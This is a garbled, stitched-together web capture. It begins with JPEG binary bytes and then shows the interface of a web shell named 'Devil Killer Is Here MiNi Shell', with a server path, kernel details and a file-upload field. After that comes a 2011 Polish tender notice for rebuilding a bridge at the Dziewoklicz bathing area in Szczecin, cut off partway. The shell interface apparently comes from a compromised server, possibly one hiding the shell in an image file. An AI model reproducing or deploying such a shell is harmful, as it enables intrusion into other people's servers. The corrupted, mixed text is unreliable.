JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111014/270383-N-2011.html

<p class="kh_header"><b>Szczecin: PRZEBUDOWA MOSTU WJAZDOWEGO NA TEREN KĄPIELISKA DZIEWOKLICZ W SZCZECINIE</b><br>
<b>Numer ogłoszenia: 270383 - 2011; data zamieszczenia: 14.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego - samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEBUDOWA MOSTU WJAZDOWEGO NA TEREN KĄPIELISKA DZIEWOKLICZ W SZCZECINIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. 	Przedmiotem zamówienia jest przebudowa mostu wjazdowego na teren kąpieliska Dziewoklicz w Szczecinie.
	 	CPV: 
		45000000 - 7	Roboty budowlane
		45100000 - 8 	Przygotowanie terenu pod budowę
		45111000 - 8 	Roboty w zakresie burzenia, roboty ziemne
		45111200 - 0	Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
		45111300 - 1	Roboty rozbiórkowe
		45113000 - 2	Roboty na placu budowy
		45200000 - 9	Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej 
i wodnej
		45221100 - 3	Roboty budowlane w zakresie budowy mostów
		45221111 - 1	Roboty budowlane w zakresie budowy mostów drogowych
		45221115 - 1	Roboty budowlane w zakresie mostów ze stali
		45230000 - 8	Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, lotnisk i kolei, wyrównania terenu,
		45233226 - 9	Roboty budowlane w zakresie dróg dojazdowych
		45240000 - 1 	Budowa obiektów inżynierii wodnej
		45243000 - 2	Roboty w zakresie ochrony przybrzeżnej
		45400000 - 1	Roboty wykończeniowe w zakresie obiektów budowlanych 
		45422000 - 1	Roboty ciesielskie
		45440000 - 3	Roboty malarskie i szklarskie
		45442000 - 7	Nakładanie powierzchni kryjących
		45231400 - 9	Roboty budowlane w zakresie budowy linii energetycznych
		45231112 - 3	Instalacja rurociągów
		45300000 - 0	Budowlane prace instalacyjne
		45332400 - 7	Roboty instalacyjne w zakresie sprzętu sanitarnego
2. Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia opisanego 
w załączniku nr 8 do SIWZ oraz zgodnie ze specyfikacją techniczną wykonania i odbioru robót budowlanych (załącznik nr 9 do SIWZ). Zakres rzeczowy przedmiotu zamówienia obejmuje m. in.:
1) 	wykonanie prac przygotowawczych,
2)	dostarczenie i wykonanie montażu i demontażu mostu tymczasowego pontonowego,
3)	wykonanie rozbiórki elementów istniejącego mostu i elementów zagospodarowania,
4)	wykonanie wykopów wraz z zabezpieczeniem skarp i odwodnieniem wykopów,
5)	zasypanie wykopów wraz z wykonaniem zagęszczenie gruntu,
6)	wykonanie pali wielkośrednicowych w rurze traconej,
7)	wykonanie montażu zbrojenia elementów żelbetowych,
8)	wykonanie robót betonowych,
9)	wykonanie montażu ustroju niosącego przęseł mostu i oczepów podpór pośrednich,
10)	wykonanie powłok malarskich konstrukcji stalowych,
11)	wykonanie powłok izolacyjnych,
12)	dostarczenie i wykonanie montażu łożysk elastomerowych,
13)	wykonanie montażu elementów drewnianych,
14)	wykonanie odwodnienia zasypki przyczółków oraz wykonanie zabezpieczenia 
z geomembrany,

15)	wykonanie umocnienia stożków przyczółkowych kostką betonową gr. 8 cm,
16)	wykonanie umocnienia dna kanału narzutem kamiennym,
17)	wykonanie nasypów, podbudowy z kruszyw, nawierzchni z płyt żelbetowych, nawierzchni z płyt betonowych, krawężników,
18)	wykonanie umocnień skarp przez humusowanie i obsianie trawą,
19)	wykonanie ogrodzenia z siatki na słupkach oraz montaż bramy wjazdowej,
20)	wykonanie cięć pielęgnacyjnych drzew i krzewów, wykonanie przesadzenia drzewa, usuniecie drzew w formie wycinki, wykonanie nasadzeń zamiennych, prowadzenie prac pielęgnacyjnych,
21)	wykonanie zabezpieczeń urządzeń obcych na czas robót,
22)	wykonanie konstrukcji pływających niezbędnych do wykonanie robót na wodzie,
23)	wykonanie oznakowania nawigacyjnego,
24)	przebudowanie linii energetycznej NN:
a)	demontaż istniejących słupów oświetleniowych wraz z oprawami oświetleniowymi i liniami zasilającymi,
	b)	roboty ziemne,
	c)	posadowienie rozdzielni energetycznej,
	d)	posadowienie słupów oświetleniowych,
	e)	montaż opraw oświetlenia zewnętrznego,
	f)	montaż sygnalizatorów świetlnych,
	g)	ułożenie rur ochronnych,
	h)	ułożenie kabli 0,4 kV,
	i)	montaż uziomu,
	j)	wykonanie pomiarów elektrycznych,
25)	przebudowanie przyłącza wodociągowego:
a)	wykonanie wykopów liniowych wraz z ich późniejszym zasypaniem, wykonanie podłoża pod rurociągi,
b)	demontaż istniejących przewodów wodociągowych,
c)	montaż rur wodociągowych w wykopie oraz do konstrukcji mostu,
d)	włączenie do istniejącego wodociągu,
e)	montaż rur i elementów preizolowanych,
f)	montaż rur ochronnych - osłonowych na rurociągach,
g)	montaż studzienki wodomierzowej,
h)	montaż uzbrojenia,
i)	odtworzenie nawierzchni. 

Zamawiający zastrzega, że część przedmiotu zamówienia polegająca na budowie mostu stałego wraz z przyczółkami nie może być powierzona podwykonawcom. 

3.	W dniu przekazania placu budowy, Wykonawca będzie zobowiązany do przekazania Zamawiającemu, zatwierdzonego przez Zamawiającego,  ostatecznego harmonogramu rzeczowo - finansowo - terminowego. W zależności od potrzeb,  na żądanie Zamawiającego, rzeczony harmonogram będzie aktualizowany w trakcie realizacji przedmiotu zamówienia, tak by odpowiadał stanowi faktycznemu w zakresie rzeczowym, finansowym i terminowym.
4.	W dniu przekazania placu budowy, Wykonawca będzie zobowiązany do przekazania Zamawiającemu, zatwierdzonego przez Zamawiającego, planu bezpieczeństwa i ochrony zdrowia oraz Programu Zapewnienia Jakości.
5.	Przed rozpoczęciem robót, Wykonawca zobowiązany jest zgłosić właścicielom lub zarządcom terenów i obiektów, z jednoczesnym powiadomieniem Zamawiającego, 
o przystąpieniu do wykonywania robót.
6.	Wykonawca będzie zobowiązany uzyskać zgodę Zamawiającego na materiały, urządzenia i wyposażenie, które zamierza zastosować do realizacji przedmiotu zamówienia. 
W celu uzyskania zgody Zamawiającego, w terminie 30 dni przed wbudowaniem materiałów, urządzeń lub wyposażenia, Wykonawca będzie zobowiązany przedłożyć Zamawiającemu atesty, certyfikaty, deklaracje zgodności, certyfikaty bezpieczeństwa, aprobaty techniczne lub świadectwa dopuszczenia do stosowania, pod rygorem odmowy zapłaty za wykonane prace, w których zostały zastosowane materiały, urządzenia 
i wyposażenie, na które Wykonawca nie uzyskał zgody Zamawiającego. 
7.	Wykonawca zobowiązany będzie - na własny koszt i we własnym zakresie - również do:
1)	wykonania, eksploatacji i rozbiórki mostu tymczasowego; w związku z tym, Wykonawca zobowiązany jest również do opracowania odpowiednich dokumentów, dokonania zgłoszeń, uzyskania zezwoleń, zgód, opinii oraz wykonania wszelkich innych czynności niezbędnych do tego, by przez cały czas realizacji zadania, funkcjonował most tymczasowy umożliwiający przeprawę z lądu stałego na wyspę Dziewoklicz,
2)	sporządzenia planu organizacji placu budowy z zaznaczeniem ogrodzenia, placów składowych, tymczasowych dróg dojazdowych i dojść, zaplecza socjalno - biurowego, oświetlenia oraz pozostałych elementów zagospodarowania placu budowy,
	3)	utrzymania właściwego porządku przy wyjeździe z placu budowy na drogi publiczne,
      4)	zabezpieczenia i oznakowania terenu budowy zgodnie z obowiązującymi przepisami oraz utrzymywania w należytym stanie tymczasowego zabezpieczenia, np. barier, oznakowania stref niebezpiecznych, znaków drogowych,
	5)	zapewnienia - w trakcie realizacji przedmiotu zamówienia - obsługi geodezyjnej (wykonywanej przez uprawnionego geodetę) obejmującej m. in. wyznaczanie, stabilizację i zabezpieczanie punktów osnowy geodezyjnej odwzorowania w terenie, oraz poniesienia wszelkich kosztów ich przeniesienia i usunięcia lub uszkodzenia,
	6)	zapewnienia - w trakcie realizacji przedmiotu zamówienia - nadzoru w zakresie faunistycznym,
	7)		zapewnienia bezpiecznych warunków realizacji robót, określonych przepisami p.poż. 
i bhp oraz przepisami dot. ochrony środowiska,
	8)	zagwarantowania dostawy mediów, w tym m. in. wody, energii elektrycznej, energii cieplnej, łączności jak i odprowadzenia nieczystości,
      9)	zabezpieczenia własnego mienia na terenie robót,
      10)	opracowania i zatwierdzenia we właściwych jednostkach projektu czasowej organizacji ruchu - na czas prowadzenia robót - wraz z uzyskaniem zezwolenia na zajęcie pasów drogowych i ulic w zakresie niezbędnym do wykonania robót oraz poniesienia z tego wynikających kosztów; Wykonawca będzie zobowiązany do wykonania wszelkich prac wynikających z w/w zezwoleń (w tym również niezbędnych badań), 
	11)	dokumentowania sposobu gospodarowania odpadami (kopie dokumentów potwierdzających sposób gospodarki odpadami Wykonawca będzie zobowiązany dołączać do dokumentacji odbiorowej),
	12)	dokonania sprawdzenia i uzgodnienia przebiegu tras uzbrojenia podziemnego oraz zgłoszenia rozpoczęcia robót właścicielom sieci i niezwłocznego zawiadomienia Zamawiającego; Wykonawca zachowa szczególną ostrożność przy wykonywaniu prac przy zbliżeniach i skrzyżowaniach z istniejąca siecią uzbrojenia podziemnego; 
W przypadku uszkodzenia instalacji lub sieci podziemnych Wykonawca - 
we własnym zakresie i na własny koszt - usunie uszkodzenie, 
 13)	uporządkowania terenu po realizacji przedmiotu zamówienia, w tym usunięcia wszelkich zanieczyszczeń oraz doprowadzenia do pełnej sprawności urządzeń i koryta cieku, uszkodzonych podczas wykonywania prac.
8.   Zamawiający zobowiązuje się:
1)	przekazać protokolarnie Wykonawcy plac budowy w terminie nie dłuższym niż 
10 dni roboczych od dnia zawarcia umowy,
2)	dokonać odbioru wykonanych prac,
3)	zapewnić zapłatę wynagrodzenia za wykonane prace.
9.  Zamawiający może żądać od Wykonawcy zmiany osoby sprawującej funkcje kierownika budowy lub kierownika robót, w przypadku nienależytego wykonywania obowiązków.
Zmiana kierownika budowy lub kierownika robót musi być zgłoszona przez Wykonawcę na piśmie wraz z przekazaniem dokumentów potwierdzających spełnienie przez wskazaną osobę wymogów określonych dla kierownika budowy lub kierownika robót, w terminie co najmniej 7 dni przed planowaną zmianą. Zamawiający ustosunkuje się do  zgłoszonej zmiany w terminie 3 dni roboczych od daty przedłożenia przez Wykonawcę zgłoszenia, 
o którym mowa w zdaniu poprzednim. 
10. Wykonawca każdorazowo wpisem do Dziennika Budowy zawiadomi Zamawiającego 
o terminach wykonania prób, sprawdzeń, badań lub pomiarów, nie później niż 5 dni przed terminem wyznaczonym na dokonanie prób, sprawdzeń, badań lub pomiarów.
11.	Zamawiający może żądać od Wykonawcy wykonania dodatkowych pomiarów sprawdzających. W przypadku, gdy dodatkowe pomiary sprawdzające wykażą, że pomiary zasadnicze są nieprawidłowe, wówczas koszt dodatkowych pomiarów sprawdzających ponosi Wykonawca.
12. Wykonawca zobowiązuje się nie przekazywać informacji związanych z realizacją umowy prasie, ani innym środkom masowego przekazu oraz osobom trzecim nie mającym związku z przedmiotem umowy. W przeciwnym wypadku Zamawiający zastrzega sobie prawo natychmiastowego odstąpienia od umowy z winy Wykonawcy bez konieczności składnia jakichkolwiek dodatkowych oświadczeń czy wezwań.
13.  Podwykonawcy:
1)	Wykonawca może wykonać przedmiot zamówienia przy udziale podwykonawców, zawierając z nimi stosowne umowy w formie pisemnej pod rygorem nieważności,
2)	Zawarcie umowy z podwykonawcą wymaga zgody Zamawiającego przed jej zawarciem,
3)	Zamawiający nie wyraża zgody na zawieranie umów przez podwykonawców 
z dalszym podwykonawcą,
4)	Zabezpieczenie ewentualnych roszczeń podwykonawców wobec Wykonawcy 
i Zamawiającego z tytułu zawarcia umowy, będzie potrącone z faktury Wykonawcy 
i zatrzymane na koncie Zamawiającego do czasu wypłaty przez Wykonawcę wynagrodzenia należnego podwykonawcy,
5)	Zwrot zabezpieczenia nastąpi z chwilą udokumentowania przez podwykonawcę otrzymania wynagrodzenia zgodnie z umową, przekazanego Zamawiającemu 
w formie jego oświadczenia,
6)	Niezależnie od uprawnień opisanych powyżej Zamawiający zastrzega sobie prawo dokonania zapłaty wynagrodzenia należnego podwykonawcy bezpośrednio na jego rachunek, na co Wykonawca wyraża zgodę,
7)	Wszelkie zmiany umów wymagają formy pisemnej pod rygorem nieważności 
i wymagają zgody Zamawiającego,
8)	Wykonawca zobowiązany jest na żądanie Zamawiającego udzielić mu wszelkich informacji dotyczących podwykonawców,
9)	Wykonawca ponosi wobec Zamawiającego pełną odpowiedzialność za roboty, które wykonuje przy pomocy podwykonawców, jak za działania własne,


10)	Zapisy pkt 4), 5) i 6) powyżej nie znajdą zastosowania, o ile Wykonawca każdorazowo wraz z fakturą za wykonane roboty dostarczy Zamawiającemu oświadczenie Podwykonawców o zapłacie na jego rzecz wymagalnych wierzytelności z tytułu robót zrealizowanych przez Podwykonawców.
14. Wykonawca wykona przedmiot zamówienia na zasadzie zapewnienia najwyższej jakości prac, zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, m. in. ustawą z dnia 27 kwietnia 2001 r. o odpadach (Dz.U. z 2010 r. Nr 185 poz. 1243 ze zmianami), ustawą  z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. Nr 92 poz. 880 ze zmianami), rozporządzeniem Ministra Infrastruktury z dnia 28 kwietnia 2003 r. w sprawie przepisów żeglugowych na śródlądowych drogach wodnych (Dz.U. Nr 212 poz. 2072),   ustawą z dnia 21 grudnia 2000 r. o żegludze śródlądowej (t.j. Dz. U. z 2006 r. Nr 123 poz. 857 ze zmianami), 
a także z zapisami Specyfikacji Istotnych Warunków Zamówienia i z ofertą, która będzie stanowiła integralną część umowy.
15.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty z powodu: 
1)	  braku lub wady dokumentacji projektowej lub wystąpienia konieczności wykonania dokumentacji zamiennej;
2)	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie robót zgodnie z zasadami współczesnej wiedzy technicznej i obowiązujących przepisów, powodujące wstrzymanie robót na co najmniej 7 dni roboczych kolejno następujących po sobie, przy czym fakt wstrzymania robót musi być potwierdzony wpisem do dziennika budowy; za wyjątkowo niesprzyjające warunki atmosferyczne należy uważać warunki atmosferyczne znacząco odbiegające od średnich warunków atmosferycznych z ostatnich 5 lat przed realizacją przedmiotu umowy, w okresie analogicznym do badanego, zanotowanych przez Instytut Meteorologii i Gospodarki Wodnej dla obszaru m. Szczecin; 
3) 	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da 		   się 	przewidzieć, np. huragan, powódź;
	4)  	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja
           	ma wpływ na termin wykonania umowy;
 5)	  wystąpienia nieprzewidzianych warunków realizacji, w tym zmiany sposobu świadczenia;
 6)	  zmiany stanu prawnego;
 7)	  nieterminowego przekazania placu budowy przez Zamawiającego, z winy Zamawiającego, o ile ma to wpływ na termin wykonania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających - zgodnie z art. 67 ust. 1 pkt 6) ustawy - do 20 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.10.00-8, 45.11.12.00-0, 45.11.13.00-1, 45.11.30.00-2, 45.20.00.00-9, 45.22.11.00-3, 45.22.11.11-1, 45.22.11.15-1, 45.23.00.00-8, 45.23.32.26-9, 45.24.00.00-1, 45.24.30.00-2, 45.40.00.00-1, 45.42.20.00-1, 45.44.00.00-3, 45.44.20.00-7, 45.23.14.00-9, 45.23.11.12-3, 45.30.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Wadium należy wnieść w następującej wysokości 70 000,00 zł (słownie: siedemdziesiąt tysięcy złotych i 00/100).
2. Wykonawca wnosi wadium w terminie do dnia 31.10.2011 r., do godziny 11.00.         Decyduje data wpływu środków do Zamawiającego.
3.	Wadium może być wnoszone:
1)	w pieniądzu - przelewem na konto Zamawiającego - 22124038131111000043932038
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym - w kasie Zamawiającego, w godz. 10.00 - 14.00,
3)	gwarancjach bankowych - w kasie Zamawiającego, w godz. 10.00 - 14.00, 
4)	gwarancjach ubezpieczeniowych - w kasie Zamawiającego, w godz. 10.00 - 14.00,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości - w kasie Zamawiającego, w godz. 10.00 - 14.00.
4.	Wadium może być wniesione w jednej lub kilku formach.
5.	W przypadku, gdy wykonawca wnosi wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
1)	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie zamawiającego (beneficjenta gwarancji) zawierające oświadczenie, że zaistniały okoliczności, o których mowa 
w pkt  8 i 9 bez potwierdzania tych okoliczności, 
2)	termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą,
3)	miejsce i termin zwrotu gwarancji.
6.	Wadium wniesione w pieniądzu zamawiający przechowa na rachunku bankowym.
7.	Wykonawca, który nie zabezpieczy swojej oferty akceptowaną formą wadium zostanie 
przez Zamawiającego wykluczony, a jego ofertę uznaje się za odrzuconą.



8.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie wykonawcy.
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba, że Wykonawca udowodni, że wynika to z przyczyn nieleżących po jego stronie.
10.	W ofercie należy wpisać rachunek bankowy, na który Zamawiający będzie mógł zwrócić wadium wniesione w formie pieniężnej.  
11.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 9.
12.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
13.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14.	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium zgodne z pkt 11, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
15.	Na wniosek Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą Zamawiający zaliczy wadium wpłacone w pieniądzu na poczet zabezpieczenia należytego wykonania umowy.
16.	Jeżeli wadium zostanie wniesione w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.   O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące m. in.:
	a)  posiadania wiedzy i doświadczenia, poprzez wykazanie, że:
A. wykonali należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej pracy podobnej do pracy objętej przedmiotem zamówienia.
Za pracę podobną do przedmiotu zamówienia Zamawiający uzna pracę polegającą na budowie lub przebudowie mostu nad przeszkodą wodną, 
o konstrukcji nośnej stalowej o podporach z pali żelbetowych traconych, 
o rozpiętości nie mniejszej niż 40 mb (rozpiętość liczona pomiędzy osiami podparcia na przyczółkach mostowych).

W przypadku, gdy jakakolwiek wartość dotycząca ww. warunków została wyrażona w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego (datą wszczęcia postępowania jest data zamieszczenia ogłoszenia o zamówieniu w miejscu publicznie dostępnym w siedzibie Zamawiającego oraz na stronie internetowej).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.   O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	spełniają warunki określone w art. 22 ust. 1 ustawy, dotyczące m. in.:
	a) dysponowania osobami zdolnymi do wykonania zamówienia, poprzez wykazanie, że:
